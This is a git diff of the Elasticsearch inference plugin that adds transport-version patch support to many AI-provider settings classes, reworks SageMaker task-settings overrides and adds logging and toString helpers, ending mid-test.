a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/request/ElasticInferenceServiceSparseEmbeddingsRequest.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/request/ElasticInferenceServiceSparseEmbeddingsRequest.java index 849c48f078cb2..ae52955c1d98f 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/request/ElasticInferenceServiceSparseEmbeddingsRequest.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/request/ElasticInferenceServiceSparseEmbeddingsRequest.java @@ -108,10 +108,10 @@ public boolean[] getTruncationInfo() { // visible for testing static ElasticInferenceServiceUsageContext inputTypeToUsageContext(InputType inputType) { switch (inputType) { - case SEARCH -> { + case SEARCH, INTERNAL_SEARCH -> { return ElasticInferenceServiceUsageContext.SEARCH; } - case INGEST -> { + case INGEST, INTERNAL_INGEST -> { return ElasticInferenceServiceUsageContext.INGEST; } default -> { diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/rerank/ElasticInferenceServiceRerankServiceSettings.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/rerank/ElasticInferenceServiceRerankServiceSettings.java index c20846c7fdfc2..eff22c2771930 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/rerank/ElasticInferenceServiceRerankServiceSettings.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/rerank/ElasticInferenceServiceRerankServiceSettings.java @@ -83,9 +83,16 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { + assert false : "should never be called when supportsVersion is used"; return TransportVersions.ML_INFERENCE_ELASTIC_RERANK; } + @Override + public boolean supportsVersion(TransportVersion version) { + return version.onOrAfter(TransportVersions.ML_INFERENCE_ELASTIC_RERANK) + || version.isPatchFrom(TransportVersions.ML_INFERENCE_ELASTIC_RERANK_ADDED_8_19); + } + @Override protected XContentBuilder toXContentFragmentOfExposedFields(XContentBuilder builder, Params params) throws IOException { builder.field(MODEL_ID, modelId); diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/response/ElasticInferenceServiceAuthorizationResponseEntity.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/response/ElasticInferenceServiceAuthorizationResponseEntity.java index 451c601e7cc91..4e2eec9de0456 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/response/ElasticInferenceServiceAuthorizationResponseEntity.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elastic/response/ElasticInferenceServiceAuthorizationResponseEntity.java @@ -7,6 +7,7 @@ package org.elasticsearch.xpack.inference.services.elastic.response; +import org.elasticsearch.common.Strings; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.common.io.stream.Writeable; @@ -14,6 +15,8 @@ import org.elasticsearch.inference.InferenceResults; import org.elasticsearch.inference.InferenceServiceResults; import org.elasticsearch.inference.TaskType; +import org.elasticsearch.logging.LogManager; +import org.elasticsearch.logging.Logger; import org.elasticsearch.xcontent.ConstructingObjectParser; import org.elasticsearch.xcontent.ParseField; import org.elasticsearch.xcontent.ToXContent; @@ -39,6 +42,9 @@ public class ElasticInferenceServiceAuthorizationResponseEntity implements InferenceServiceResults { public static final String NAME = "elastic_inference_service_auth_results"; + + private static final Logger logger = LogManager.getLogger(ElasticInferenceServiceAuthorizationResponseEntity.class); + private static final String AUTH_FIELD_NAME = "authorized_models"; private static final Map ELASTIC_INFERENCE_SERVICE_TASK_TYPE_MAPPING = Map.of( "embed/text/sparse", TaskType.SPARSE_EMBEDDING, @@ -107,6 +113,11 @@ public XContentBuilder toXContent(XContentBuilder builder, Params params) throws return builder; } + + @Override + public String toString() { + return Strings.format("{modelName='%s', taskTypes='%s'}", modelName, taskTypes); + } } private final List authorizedModels; @@ -138,6 +149,11 @@ public List getAuthorizedModels() { return authorizedModels; } + @Override + public String toString() { + return authorizedModels.stream().map(AuthorizedModel::toString).collect(Collectors.joining(", ")); + } + @Override public Iterator toXContentChunked(ToXContent.Params params) { throw new UnsupportedOperationException(); diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elasticsearch/ElserModels.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elasticsearch/ElserModels.java index c1764b93bfc82..e5af1da030ef1 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elasticsearch/ElserModels.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/elasticsearch/ElserModels.java @@ -26,8 +26,4 @@ public static boolean isValidModel(String model) { return model != null && VALID_ELSER_MODEL_IDS.contains(model); } - public static boolean isValidEisModel(String model) { - return ELSER_V2_MODEL.equals(model); - } - } diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/googlevertexai/completion/GoogleVertexAiChatCompletionServiceSettings.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/googlevertexai/completion/GoogleVertexAiChatCompletionServiceSettings.java index 105d76a9f8ccb..a753fc5dc66f2 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/googlevertexai/completion/GoogleVertexAiChatCompletionServiceSettings.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/googlevertexai/completion/GoogleVertexAiChatCompletionServiceSettings.java @@ -118,9 +118,16 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { + assert false : "should never be called when supportsVersion is used"; return TransportVersions.ML_INFERENCE_VERTEXAI_CHATCOMPLETION_ADDED; } + @Override + public boolean supportsVersion(TransportVersion version) { + return version.onOrAfter(TransportVersions.ML_INFERENCE_VERTEXAI_CHATCOMPLETION_ADDED) + || version.isPatchFrom(TransportVersions.ML_INFERENCE_VERTEXAI_CHATCOMPLETION_ADDED_8_19); + } + @Override public void writeTo(StreamOutput out) throws IOException { out.writeString(projectId); diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/huggingface/completion/HuggingFaceChatCompletionServiceSettings.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/huggingface/completion/HuggingFaceChatCompletionServiceSettings.java index af88316ef5161..cdc2529428bed 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/huggingface/completion/HuggingFaceChatCompletionServiceSettings.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/huggingface/completion/HuggingFaceChatCompletionServiceSettings.java @@ -144,9 +144,16 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { + assert false : "should never be called when supportsVersion is used"; return TransportVersions.ML_INFERENCE_HUGGING_FACE_CHAT_COMPLETION_ADDED; } + @Override + public boolean supportsVersion(TransportVersion version) { + return version.onOrAfter(TransportVersions.ML_INFERENCE_HUGGING_FACE_CHAT_COMPLETION_ADDED) + || version.isPatchFrom(TransportVersions.ML_INFERENCE_HUGGING_FACE_CHAT_COMPLETION_ADDED_8_19); + } + @Override public void writeTo(StreamOutput out) throws IOException { out.writeOptionalString(modelId); diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/huggingface/rerank/HuggingFaceRerankServiceSettings.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/huggingface/rerank/HuggingFaceRerankServiceSettings.java index 3d4c6aef71e96..b0b21b26395af 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/huggingface/rerank/HuggingFaceRerankServiceSettings.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/huggingface/rerank/HuggingFaceRerankServiceSettings.java @@ -115,9 +115,16 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { + assert false : "should never be called when supportsVersion is used"; return TransportVersions.ML_INFERENCE_HUGGING_FACE_RERANK_ADDED; } + @Override + public boolean supportsVersion(TransportVersion version) { + return version.onOrAfter(TransportVersions.ML_INFERENCE_HUGGING_FACE_RERANK_ADDED) + || version.isPatchFrom(TransportVersions.ML_INFERENCE_HUGGING_FACE_RERANK_ADDED_8_19); + } + @Override public void writeTo(StreamOutput out) throws IOException { out.writeString(uri.toString()); diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/huggingface/rerank/HuggingFaceRerankTaskSettings.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/huggingface/rerank/HuggingFaceRerankTaskSettings.java index 9f90386edff90..8b9e9113bce12 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/huggingface/rerank/HuggingFaceRerankTaskSettings.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/huggingface/rerank/HuggingFaceRerankTaskSettings.java @@ -118,9 +118,16 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { + assert false : "should never be called when supportsVersion is used"; return TransportVersions.ML_INFERENCE_HUGGING_FACE_RERANK_ADDED; } + @Override + public boolean supportsVersion(TransportVersion version) { + return version.onOrAfter(TransportVersions.ML_INFERENCE_HUGGING_FACE_RERANK_ADDED) + || version.isPatchFrom(TransportVersions.ML_INFERENCE_HUGGING_FACE_RERANK_ADDED_8_19); + } + @Override public void writeTo(StreamOutput out) throws IOException { out.writeOptionalVInt(topNDocumentsOnly); diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/mistral/completion/MistralChatCompletionServiceSettings.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/mistral/completion/MistralChatCompletionServiceSettings.java index 676653d54a560..89b9475ad65d8 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/mistral/completion/MistralChatCompletionServiceSettings.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/mistral/completion/MistralChatCompletionServiceSettings.java @@ -78,9 +78,16 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { + assert false : "should never be called when supportsVersion is used"; return TransportVersions.ML_INFERENCE_MISTRAL_CHAT_COMPLETION_ADDED; } + @Override + public boolean supportsVersion(TransportVersion version) { + return version.onOrAfter(TransportVersions.ML_INFERENCE_MISTRAL_CHAT_COMPLETION_ADDED) + || version.isPatchFrom(TransportVersions.ML_INFERENCE_MISTRAL_CHAT_COMPLETION_ADDED_8_19); + } + @Override public String modelId() { return this.modelId; diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/model/SageMakerModel.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/model/SageMakerModel.java index 48e32c741a601..0975f8616da03 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/model/SageMakerModel.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/model/SageMakerModel.java @@ -116,7 +116,7 @@ public SageMakerModel override(Map taskSettingsOverride) { getConfigurations(), getSecrets(), serviceSettings, - taskSettings.updatedTaskSettings(taskSettingsOverride), + taskSettings.override(taskSettingsOverride), awsSecretSettings ); } diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/model/SageMakerServiceSettings.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/model/SageMakerServiceSettings.java index 2caf97bdd05b7..b7a554d387c84 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/model/SageMakerServiceSettings.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/model/SageMakerServiceSettings.java @@ -111,9 +111,16 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { + assert false : "should never be called when supportsVersion is used"; return TransportVersions.ML_INFERENCE_SAGEMAKER; } + @Override + public boolean supportsVersion(TransportVersion version) { + return version.onOrAfter(TransportVersions.ML_INFERENCE_SAGEMAKER) + || version.isPatchFrom(TransportVersions.ML_INFERENCE_SAGEMAKER_8_19); + } + @Override public void writeTo(StreamOutput out) throws IOException { out.writeString(endpointName()); diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/model/SageMakerTaskSettings.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/model/SageMakerTaskSettings.java index c1c244cc37051..a36944c51f104 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/model/SageMakerTaskSettings.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/model/SageMakerTaskSettings.java @@ -71,11 +71,21 @@ public boolean isEmpty() { @Override public SageMakerTaskSettings updatedTaskSettings(Map newSettings) { var validationException = new ValidationException(); - var updateTaskSettings = fromMap(newSettings, apiTaskSettings.updatedTaskSettings(newSettings), validationException); + validationException.throwIfValidationErrorsExist(); + return override(updateTaskSettings); + } + + public SageMakerTaskSettings override(Map newSettings) { + var validationException = new ValidationException(); + var updateTaskSettings = fromMap(newSettings, apiTaskSettings.override(newSettings), validationException); validationException.throwIfValidationErrorsExist(); + return override(updateTaskSettings); + } + + private SageMakerTaskSettings override(SageMakerTaskSettings updateTaskSettings) { var updatedExtraTaskSettings = updateTaskSettings.apiTaskSettings().equals(SageMakerStoredTaskSchema.NO_OP) ? apiTaskSettings : updateTaskSettings.apiTaskSettings(); @@ -101,9 +111,16 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { + assert false : "should never be called when supportsVersion is used"; return TransportVersions.ML_INFERENCE_SAGEMAKER; } + @Override + public boolean supportsVersion(TransportVersion version) { + return version.onOrAfter(TransportVersions.ML_INFERENCE_SAGEMAKER) + || version.isPatchFrom(TransportVersions.ML_INFERENCE_SAGEMAKER_8_19); + } + @Override public void writeTo(StreamOutput out) throws IOException { out.writeOptionalString(customAttributes); diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/SageMakerStoredServiceSchema.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/SageMakerStoredServiceSchema.java index 9fb320a2d364a..b3d948a85de97 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/SageMakerStoredServiceSchema.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/SageMakerStoredServiceSchema.java @@ -29,9 +29,16 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { + assert false : "should never be called when supportsVersion is used"; return TransportVersions.ML_INFERENCE_SAGEMAKER; } + @Override + public boolean supportsVersion(TransportVersion version) { + return version.onOrAfter(TransportVersions.ML_INFERENCE_SAGEMAKER) + || version.isPatchFrom(TransportVersions.ML_INFERENCE_SAGEMAKER_8_19); + } + @Override public void writeTo(StreamOutput out) { diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/SageMakerStoredTaskSchema.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/SageMakerStoredTaskSchema.java index 2aa2f9556d415..a3ff632f466c2 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/SageMakerStoredTaskSchema.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/SageMakerStoredTaskSchema.java @@ -39,9 +39,16 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { + assert false : "should never be called when supportsVersion is used"; return TransportVersions.ML_INFERENCE_SAGEMAKER; } + @Override + public boolean supportsVersion(TransportVersion version) { + return version.onOrAfter(TransportVersions.ML_INFERENCE_SAGEMAKER) + || version.isPatchFrom(TransportVersions.ML_INFERENCE_SAGEMAKER_8_19); + } + @Override public void writeTo(StreamOutput out) {} @@ -61,4 +68,8 @@ default boolean isFragment() { @Override SageMakerStoredTaskSchema updatedTaskSettings(Map newSettings); + + default SageMakerStoredTaskSchema override(Map newSettings) { + return updatedTaskSettings(newSettings); + } } diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/elastic/ElasticPayload.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/elastic/ElasticPayload.java index 46c5a9eb30a9a..781b1e906a17f 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/elastic/ElasticPayload.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/elastic/ElasticPayload.java @@ -88,12 +88,6 @@ default SdkBytes requestBytes(SageMakerModel model, SageMakerInferenceRequest re @Override default SageMakerElasticTaskSettings apiTaskSettings(Map taskSettings, ValidationException validationException) { - if (taskSettings != null && (taskSettings.isEmpty() == false)) { - validationException.addValidationError( - InferenceAction.Request.TASK_SETTINGS.getPreferredName() - + " is only supported during the inference request and cannot be stored in the inference endpoint." - ); - } return SageMakerElasticTaskSettings.empty(); } diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/elastic/ElasticTextEmbeddingPayload.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/elastic/ElasticTextEmbeddingPayload.java index cf9d24a86dcc3..6e1407beab1d8 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/elastic/ElasticTextEmbeddingPayload.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/elastic/ElasticTextEmbeddingPayload.java @@ -250,9 +250,16 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { + assert false : "should never be called when supportsVersion is used"; return TransportVersions.ML_INFERENCE_SAGEMAKER_ELASTIC; } + @Override + public boolean supportsVersion(TransportVersion version) { + return version.onOrAfter(TransportVersions.ML_INFERENCE_SAGEMAKER_ELASTIC) + || version.isPatchFrom(TransportVersions.ML_INFERENCE_SAGEMAKER_ELASTIC_8_19); + } + @Override public void writeTo(StreamOutput out) throws IOException { out.writeOptionalVInt(dimensions); diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/elastic/SageMakerElasticTaskSettings.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/elastic/SageMakerElasticTaskSettings.java index 3cdcbb35ffdc9..dc0bc91fccd75 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/elastic/SageMakerElasticTaskSettings.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/elastic/SageMakerElasticTaskSettings.java @@ -9,10 +9,12 @@ import org.elasticsearch.TransportVersion; import org.elasticsearch.TransportVersions; +import org.elasticsearch.common.ValidationException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.core.Nullable; import org.elasticsearch.xcontent.XContentBuilder; +import org.elasticsearch.xpack.core.inference.action.InferenceAction; import org.elasticsearch.xpack.inference.services.sagemaker.schema.SageMakerStoredTaskSchema; import java.io.IOException; @@ -40,6 +42,16 @@ public boolean isEmpty() { @Override public SageMakerStoredTaskSchema updatedTaskSettings(Map newSettings) { + var validationException = new ValidationException(); + validationException.addValidationError( + InferenceAction.Request.TASK_SETTINGS.getPreferredName() + + " is only supported during the inference request and cannot be stored in the inference endpoint." + ); + throw validationException; + } + + @Override + public SageMakerStoredTaskSchema override(Map newSettings) { return new SageMakerElasticTaskSettings(newSettings); } @@ -50,9 +62,16 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { + assert false : "should never be called when supportsVersion is used"; return TransportVersions.ML_INFERENCE_SAGEMAKER_ELASTIC; } + @Override + public boolean supportsVersion(TransportVersion version) { + return version.onOrAfter(TransportVersions.ML_INFERENCE_SAGEMAKER_ELASTIC) + || version.isPatchFrom(TransportVersions.ML_INFERENCE_SAGEMAKER_ELASTIC_8_19); + } + @Override public void writeTo(StreamOutput out) throws IOException { out.writeGenericMap(passthroughSettings); diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/openai/OpenAiTextEmbeddingPayload.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/openai/OpenAiTextEmbeddingPayload.java index 276c407d694d6..6fcbd309551e3 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/openai/OpenAiTextEmbeddingPayload.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/openai/OpenAiTextEmbeddingPayload.java @@ -138,9 +138,16 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { + assert false : "should never be called when supportsVersion is used"; return TransportVersions.ML_INFERENCE_SAGEMAKER; } + @Override + public boolean supportsVersion(TransportVersion version) { + return version.onOrAfter(TransportVersions.ML_INFERENCE_SAGEMAKER) + || version.isPatchFrom(TransportVersions.ML_INFERENCE_SAGEMAKER_8_19); + } + @Override public void writeTo(StreamOutput out) throws IOException { out.writeOptionalInt(dimensions); diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/openai/SageMakerOpenAiTaskSettings.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/openai/SageMakerOpenAiTaskSettings.java index 4eeba9f69022d..b8ce19ba712bf 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/openai/SageMakerOpenAiTaskSettings.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/openai/SageMakerOpenAiTaskSettings.java @@ -37,9 +37,16 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { + assert false : "should never be called when supportsVersion is used"; return TransportVersions.ML_INFERENCE_SAGEMAKER_CHAT_COMPLETION; } + @Override + public boolean supportsVersion(TransportVersion version) { + return version.onOrAfter(TransportVersions.ML_INFERENCE_SAGEMAKER_CHAT_COMPLETION) + || version.isPatchFrom(TransportVersions.ML_INFERENCE_SAGEMAKER_CHAT_COMPLETION_8_19); + } + @Override public void writeTo(StreamOutput out) throws IOException { out.writeOptionalString(user); diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/voyageai/VoyageAIServiceSettings.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/voyageai/VoyageAIServiceSettings.java index 75497d1a4b4f0..ba7db5bc16f47 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/voyageai/VoyageAIServiceSettings.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/voyageai/VoyageAIServiceSettings.java @@ -108,9 +108,16 @@ public XContentBuilder toXContentFragmentOfExposedFields(XContentBuilder builder @Override public TransportVersion getMinimalSupportedVersion() { + assert false : "should never be called when supportsVersion is used"; return TransportVersions.VOYAGE_AI_INTEGRATION_ADDED; } + @Override + public boolean supportsVersion(TransportVersion version) { + return version.onOrAfter(TransportVersions.VOYAGE_AI_INTEGRATION_ADDED) + || version.isPatchFrom(TransportVersions.VOYAGE_AI_INTEGRATION_ADDED_BACKPORT_8_X); + } + @Override public void writeTo(StreamOutput out) throws IOException { out.writeString(modelId); diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/voyageai/embeddings/VoyageAIEmbeddingsServiceSettings.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/voyageai/embeddings/VoyageAIEmbeddingsServiceSettings.java index cc4db278d0e2b..a0960fb6f74aa 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/voyageai/embeddings/VoyageAIEmbeddingsServiceSettings.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/voyageai/embeddings/VoyageAIEmbeddingsServiceSettings.java @@ -226,9 +226,16 @@ protected XContentBuilder toXContentFragmentOfExposedFields(XContentBuilder buil @Override public TransportVersion getMinimalSupportedVersion() { + assert false : "should never be called when supportsVersion is used"; return TransportVersions.VOYAGE_AI_INTEGRATION_ADDED; } + @Override + public boolean supportsVersion(TransportVersion version) { + return version.onOrAfter(TransportVersions.VOYAGE_AI_INTEGRATION_ADDED) + || version.isPatchFrom(TransportVersions.VOYAGE_AI_INTEGRATION_ADDED_BACKPORT_8_X); + } + @Override public void writeTo(StreamOutput out) throws IOException { commonSettings.writeTo(out); diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/voyageai/embeddings/VoyageAIEmbeddingsTaskSettings.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/voyageai/embeddings/VoyageAIEmbeddingsTaskSettings.java index 2c6bf3a59c617..11728075fe2b8 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/voyageai/embeddings/VoyageAIEmbeddingsTaskSettings.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/voyageai/embeddings/VoyageAIEmbeddingsTaskSettings.java @@ -162,9 +162,16 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { + assert false : "should never be called when supportsVersion is used"; return TransportVersions.VOYAGE_AI_INTEGRATION_ADDED; } + @Override + public boolean supportsVersion(TransportVersion version) { + return version.onOrAfter(TransportVersions.VOYAGE_AI_INTEGRATION_ADDED) + || version.isPatchFrom(TransportVersions.VOYAGE_AI_INTEGRATION_ADDED_BACKPORT_8_X); + } + @Override public void writeTo(StreamOutput out) throws IOException { out.writeOptionalEnum(inputType); diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/voyageai/rerank/VoyageAIRerankServiceSettings.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/voyageai/rerank/VoyageAIRerankServiceSettings.java index 1d3607922c5c2..4e23efac2701c 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/voyageai/rerank/VoyageAIRerankServiceSettings.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/voyageai/rerank/VoyageAIRerankServiceSettings.java @@ -90,9 +90,16 @@ protected XContentBuilder toXContentFragmentOfExposedFields(XContentBuilder buil @Override public TransportVersion getMinimalSupportedVersion() { + assert false : "should never be called when supportsVersion is used"; return TransportVersions.VOYAGE_AI_INTEGRATION_ADDED; } + @Override + public boolean supportsVersion(TransportVersion version) { + return version.onOrAfter(TransportVersions.VOYAGE_AI_INTEGRATION_ADDED) + || version.isPatchFrom(TransportVersions.VOYAGE_AI_INTEGRATION_ADDED_BACKPORT_8_X); + } + @Override public void writeTo(StreamOutput out) throws IOException { commonSettings.writeTo(out); diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/voyageai/rerank/VoyageAIRerankTaskSettings.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/voyageai/rerank/VoyageAIRerankTaskSettings.java index a5004fde1e17e..9e57b58487674 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/voyageai/rerank/VoyageAIRerankTaskSettings.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/services/voyageai/rerank/VoyageAIRerankTaskSettings.java @@ -135,9 +135,16 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { + assert false : "should never be called when supportsVersion is used"; return TransportVersions.VOYAGE_AI_INTEGRATION_ADDED; } + @Override + public boolean supportsVersion(TransportVersion version) { + return version.onOrAfter(TransportVersions.VOYAGE_AI_INTEGRATION_ADDED) + || version.isPatchFrom(TransportVersions.VOYAGE_AI_INTEGRATION_ADDED_BACKPORT_8_X); + } + @Override public void writeTo(StreamOutput out) throws IOException { out.writeOptionalInt(topKDocumentsOnly); diff --git a/x-pack/plugin/inference/src/test/java/org/elasticsearch/index/query/SemanticKnnVectorQueryRewriteInterceptorTests.java b/x-pack/plugin/inference/src/test/java/org/elasticsearch/index/query/SemanticKnnVectorQueryRewriteInterceptorTests.java index 270cdba6d3469..1f0b56e3d6848 100644 --- a/x-pack/plugin/inference/src/test/java/org/elasticsearch/index/query/SemanticKnnVectorQueryRewriteInterceptorTests.java +++ b/x-pack/plugin/inference/src/test/java/org/elasticsearch/index/query/SemanticKnnVectorQueryRewriteInterceptorTests.java @@ -61,6 +61,14 @@ public void testKnnQueryWithVectorBuilderIsInterceptedAndRewritten() throws IOEx QueryRewriteContext context = createQueryRewriteContext(inferenceFields); QueryVectorBuilder queryVectorBuilder = new TextEmbeddingQueryVectorBuilder(INFERENCE_ID, QUERY); KnnVectorQueryBuilder original = new KnnVectorQueryBuilder(FIELD_NAME, queryVectorBuilder, 10, 100, null); + if (randomBoolean()) { + float boost = randomFloatBetween(1, 10, randomBoolean()); + original.boost(boost); + } + if (randomBoolean()) { + String queryName = randomAlphaOfLength(5); + original.queryName(queryName); + } testRewrittenInferenceQuery(context, original); } @@ 